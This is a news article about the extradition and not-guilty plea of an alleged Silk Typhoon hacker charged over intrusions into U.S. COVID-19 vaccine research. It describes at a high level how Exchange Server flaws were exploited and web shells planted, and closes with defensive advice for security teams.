Silk Typhoon Hacker Extradited to U.S. for COVID Vaccine Theft

A 34-year-old Chinese national accused of orchestrating cyberattacks against U.S. COVID-19 vaccine researchers made his first court appearance Monday after being extradited from Italy. Xu Zewei pleaded not guilty to all nine charges, claiming the arrest was a case of mistaken identity.

Federal prosecutors allege Xu operated as part of Silk Typhoon, the Chinese state-sponsored hacking group that Microsoft tracks as one of the most prolific threat actors targeting Western research institutions. The indictment connects him to attacks spanning February 2020 through June 2021—a period when COVID-19 vaccine development was a global priority.

The Charges

Xu faces nine federal counts including wire fraud, conspiracy to damage protected computers, and aggravated identity theft. If convicted on all charges, he faces decades in federal prison.

According to the indictment, Xu and his co-conspirators "hacked and otherwise targeted U.S.-based universities, immunologists, and virologists conducting research into COVID-19 vaccines, treatment, and testing" beginning in early 2020. A Texas university was specifically named as a victim, with attackers exfiltrating vaccine-related research data.

His co-defendant, Chinese national Zhang Yu, remains at large. Both allegedly operated under direction from China's Ministry of State Security Shanghai bureau while employed at Shanghai Powerock Network Co. Ltd.

The Hafnium Connection

The attack methods align with techniques Microsoft attributed to Silk Typhoon—also known as Hafnium—in its 2021 disclosure of mass exploitation campaigns. Beginning in late 2020, Xu's group allegedly "exploited certain vulnerabilities in Microsoft Exchange Server" to deploy web shells that provided persistent remote access.

Those Exchange Server vulnerabilities became some of the most widely exploited flaws in recent memory, affecting tens of thousands of organizations globally. While Silk Typhoon's initial targets were research institutions, the web shells they planted were later discovered by other threat actors who used them for ransomware deployment and additional espionage operations.

The Exchange attacks represented a shift in Chinese cyber operations toward more aggressive, widespread targeting. Rather than surgical strikes against specific high-value targets, Silk Typhoon cast a wide net and sorted through compromised organizations afterward.

Extradition and Legal Proceedings

Italian authorities arrested Xu in July 2025 while he was traveling outside China. The extradition process took approximately ten months, with Xu fighting the transfer through Italian courts.

His defense attorney stated that Xu "categorically denies any involvement" in the alleged hacking activities and maintains the case is one of mistaken identity. Chinese government officials have not commented on the arrest.

The successful extradition marks a significant development in U.S. efforts to prosecute Chinese cyber actors. Most indictments against Chinese hackers result in charges filed against individuals who never leave China and face no realistic prospect of arrest. Catching an alleged operator while traveling represents a rare opportunity for prosecution.

State-Sponsored IP Theft

The COVID-19 vaccine research theft fits a well-documented pattern of Chinese state-sponsored intellectual property targeting. During the pandemic's early months, multiple security vendors reported increased Chinese APT activity against pharmaceutical companies, research universities, and government health agencies.

The timing was no coincidence. China's domestic vaccine development efforts lagged behind Western programs, creating strategic incentive to acquire research through cyber operations. By mid-2020, Silk Typhoon was one of several Chinese groups actively targeting vaccine research.

This case echoes the espionage campaigns we've seen from Russian actors targeting political and military targets. The difference is the focus on commercial and scientific intellectual property rather than political intelligence.

Why This Matters

Xu's prosecution represents one of the few instances where a Chinese cyber operator will face an American courtroom. Most cases result in sealed indictments that serve more as diplomatic messaging than law enforcement actions.

The case also highlights the continued challenge of attribution and prosecution in state-sponsored hacking. Despite years of evidence linking Chinese military and intelligence units to cyber espionage, prosecutions remain rare. When they do occur, they typically require an operational error—like international travel—that exposes the individual to arrest.

For security teams, the Silk Typhoon case underscores that nation-state actors remain actively interested in research institutions, healthcare organizations, and any entity holding valuable intellectual property. The threat didn't end with COVID-19 vaccine development. Chinese APT groups have since pivoted to semiconductor research, AI development, and quantum computing as strategic targets.

Organizations in these sectors should review their Exchange Server patching status, web shell detection capabilities, and authentication logs for signs of persistent access. The techniques Xu allegedly used remain effective against unpatched systems, and Silk Typhoon continues operating despite this prosecution.